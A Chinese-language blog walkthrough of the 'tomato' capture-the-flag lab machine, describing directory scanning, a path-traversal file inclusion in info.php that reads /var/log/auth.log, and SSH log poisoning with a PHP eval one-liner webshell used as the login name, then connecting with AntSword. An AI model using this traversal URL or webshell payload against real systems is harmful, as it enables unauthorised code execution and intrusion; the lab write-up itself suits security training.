当前位置: 首页 > news >正文

tomato靶场通关攻略

1.打开tomato靶机和kali虚拟机

2.运用kali扫描靶机ip

3.浏览器访问靶机ip

4.kali   dirb扫描敏感文件

5.依次查看这几个文件,发现antibot_image下有文件info.php,发现一个被注释的get型文件包含漏洞,参数为image

6.查看日志文件

http://192.168.126.151/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log

7.将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。

http://192.168.126.151:2211/<?php @eval($_POST['cmd']);?>

运用蚁剑连接木马,连接成功即可

相关文章:

  • C++编译问题——1模板函数的实现必须在头文件中
  • 生成式AI+安全:API防护的“进化革命”——从被动防御到智能对抗的技术跃迁
  • 得物 Android Crash 治理实践
  • Vim忍者速成秘卷:让你的键盘冒出残影の奥义
  • 鸿蒙OS开发ForEach循环渲染
  • qt中再函数中开辟的内存,要不要手动释放?
  • 实现图形界面访问无显示器服务器
  • 【面试】JVM
  • 侯捷C++课程学习笔记:详解多态(五)
  • 【后端】【django drf】django自动导出优雅的api文档的写法
  • easy-poi导出and导入一对多数据excel
  • 基于深度学习的多模态人脸情绪识别研究与实现(视频+图像+语音)
  • mov格式视频如何转换mp4?
  • GESP2024年3月认证C++三级( 第三部分编程题(2)完全平方数)
  • PlainUSR|LIA: 追求更快的卷积网络实现高效的超分辨率重建
  • USB数据采集卡 Labview采集卡 32路AD模拟量采集 DAQ卡
  • 前瞻技术新趋势:改变未来生活方式的技术探索
  • 一个简单的PHP框架
  • 在 Qt 中自定义控件样式:使用 QProxyStyle 代理和修改绘制元素
  • PostgreSQL 部署全攻略:单机与集群模式详解
  • 下辖各区密集“联手”,南京在下一盘什么样的棋?
  • 打击网络侵权盗版!四部门联合启动“剑网2025”专项行动
  • 阿联酋与美国达成超过2000亿美元协议
  • 一涉嫌开设赌场的网上在逃人员在山东威海落网
  • 沪指跌0.68%报3380.82点,创指跌1.92%:券商、军工跌幅靠前
  • 曾犯强奸罪教师出狱后办教培机构?柳州鱼峰区教育局:正核实